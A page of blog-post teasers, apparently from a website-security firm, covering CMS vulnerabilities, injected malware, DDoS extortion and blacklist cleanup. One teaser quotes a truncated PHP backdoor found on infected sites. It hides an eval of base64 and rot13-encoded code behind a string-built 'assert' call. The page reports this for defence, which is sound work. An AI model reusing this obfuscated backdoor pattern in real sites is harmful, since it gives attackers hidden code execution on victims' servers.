The Joomla! team released a new version of Joomla! CMS yesterday to patch a serious, easy-to-exploit remote code execution vulnerability that affected…
Last March we described a WordPress attack that was responsible for hidden iframe injections that resembled Darkleech injections: declarations of styles with random names and…
We see quite a few sites with the following injected PHP code: //###=CACHE START=### error_reporting(0); $strings = "as";$strings .= "sert"; @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXF…skipped…Tyvqwg9"));')); //###=CACHE END=### This malware…
We leverage OSSEC extensively to help monitor and protect our servers. If you are not familiar with OSSEC, it is an open source Host-Based Intrusion Detection…
Over the past few months, our security operations group has identified and mitigated an increasing number of DDoS attacks tied to extortion attempts from different…
We frequently clean blacklisted websites and submit reconsideration requests to have them de-listed. We have encountered many kinds of blacklist warnings including search engines, anti-virus programs,…
Do you remember SweetCAPTCHA, which tried to monetize its WordPress plugin by injecting unwanted ads into web pages? Today we've found another CAPTCHA plugin with a…
Recently I analyzed a porn doorway script and found an interesting way to obfuscate an IP address there. $adr1 = “………………………………………………………………………………………………………………………………………………………..”; $adr2 = “………………………………………………………………………………………………………………………………………………………………………………………………………………..”; $adr3…